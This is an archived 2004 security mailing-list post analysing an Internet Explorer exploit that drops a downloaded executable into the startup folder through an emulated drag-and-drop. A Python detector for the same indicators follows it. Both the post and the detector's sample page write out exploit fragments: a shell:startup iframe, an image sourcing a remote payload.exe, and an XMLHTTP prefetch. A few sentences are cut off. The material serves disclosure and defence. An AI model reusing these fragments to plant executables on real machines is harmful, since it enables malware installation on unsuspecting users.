Re: [Full-Disclosure] Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]
From: Alla Bezroutchko (allascanit.be)
Date: Tue Sep 07 2004 - 09:10:18 CDT
Martin Stricker wrote:
> I just got attached e-mail. On the linked website I found this exploit
> code (sorry for the line breaks):
As far as I can figure out it is a combination of two unpatched
vulnerabilities. First it uses method assignment vulnerability
(discovered by Paul (at) greyhats cjb net - see
http://www.securityfocus.com/archive/1/368671) to get into Local
Once in local computer zone it does what I believe is a variation of
drag and drop file installation vulnerability discovered by http-equiv.
The interesting twist is that instead of tricking the user into
dragging and dropping something (as mikx demonstrated at
http://www.mikx.de/scrollbar/) they get the user to click on an image
and then pull the window with the image from under the mouse to emulate
drag and drop.
First they create an iframe with shell:startup folder.
<iframe src=shell:startup HEIGHT=5000; WIDTH=5000
Then they open a popup window that covers the whole screen and shows an
image 1.gif using styles. The src of the image points to the payload
executable. The image is an animated gif that first shows a counter and
then says "Click to enter".
<span style=position: absolute; left: 1; top: 1 id=absspan>
<textarea id=txt rows=1 cols=20 style=display:none>
<html><body><table width=100% height=100%><tr ALIGN=LEFT
VALIGN=TOP><br><center><img src=http://removed/payload.exe id=anch
When the user clicks on the image, the underlying popup window is moved
by calling parent.pop.show(1,1,1,1) . So the image is effectively
dragged into shell:startup, and the executable is installed in the
startup folder. This technique (pull the window from under the mouse to
emulate drag and drop) AFAIK was first shown by Liu Die Yu in
Another trick that they use is to download the payload executable first,
using XmlHTTP object. I think this is to get it cached, and make the
whole exploit more reliable.
Also interesting that they don't use
in this exploit which seems to be an essential part of http-equiv's and
Browser Security Test - http://bcheck.scanit.be/bcheck/
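A defender-side check for the page features the post describes, added here as an example and not code from the original message or the analysed page: it flags an iframe whose src uses the shell: scheme, an img whose src is an executable, an XMLHTTP prefetch, and a window .show() call. The sample HTML and the benign control page are constructed for this example; "removed" is the post's own redacted host name.

```python
import re
from html.parser import HTMLParser

# Constructed sample combining the features named in the post
# (not the original page); "removed" is the post's redacted host.
SAMPLE_PAGE = """<html><body>
<iframe src=shell:startup height=5000 width=5000></iframe>
<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "http://removed/payload.exe", false);
function go() { parent.pop.show(1,1,1,1); }
</script>
<img src=http://removed/payload.exe id=anch onclick="go()">
</body></html>"""

# Constructed benign page used as a negative control.
BENIGN_PAGE = ('<html><body><iframe src="https://example.org/frame.html">'
               '</iframe><img src="/logo.gif"></body></html>')

EXE_RE = re.compile(r"\.(exe|scr|pif|com|bat)(\?.*)?$", re.I)

class ShellDropIndicators(HTMLParser):
    """Collects markup-level indicators: an iframe whose src uses the
    shell: scheme, and an <img> whose src points at an executable."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Unquoted attribute values (as in the post) are handled by HTMLParser.
        src = (dict(attrs).get("src") or "").strip()
        if tag == "iframe" and src.lower().startswith("shell:"):
            self.findings.append(("iframe_shell_url", src))
        elif tag == "img" and EXE_RE.search(src):
            self.findings.append(("img_src_executable", src))

# Script-level indicators; each is noisy on its own and only meaningful
# together with the markup findings above.
SCRIPT_PATTERNS = {
    "xmlhttp_prefetch": re.compile(r"XMLHTTP", re.I),      # payload cached first
    "window_show_move": re.compile(r"\.show\s*\(", re.I),  # window pulled under cursor
}

def scan(html):
    """Return (indicator, evidence) pairs found in an HTML document."""
    parser = ShellDropIndicators()
    parser.feed(html)
    findings = list(parser.findings)
    for name, pattern in SCRIPT_PATTERNS.items():
        match = pattern.search(html)
        if match:
            findings.append((name, match.group(0)))
    return findings
```

Treat a page as suspect only when the markup findings and at least one script indicator occur together; the script patterns alone match plenty of legitimate pages.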